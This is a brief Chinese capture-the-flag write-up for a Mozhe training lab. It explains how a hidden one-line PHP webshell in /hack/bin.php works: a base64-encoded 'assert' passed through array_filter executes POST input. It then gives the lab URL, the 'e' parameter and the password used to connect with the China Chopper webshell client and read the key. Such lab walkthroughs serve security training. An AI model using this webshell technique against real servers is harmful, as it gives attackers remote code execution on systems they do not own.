靶场地址:
https://www.mozhe.cn/bug/detail/ZVNlS096cEV0WHZsTzdKNHBKZXljUT09bW96aGUmozhe
下载源码,找到一句话木马文件
在/hack/bin.php发现疑似一句话木马的语句

此时如果传递e为assert的base64编码YXNzZXJ0,加上_POST[‘POST’]),array_filter会执行该函数,这样就构成了一句话木马
上菜刀连接http://219.153.49.228:46242/www/hack/bin.php?e=YXNzZXJ0
,密码POST,找到key

网友评论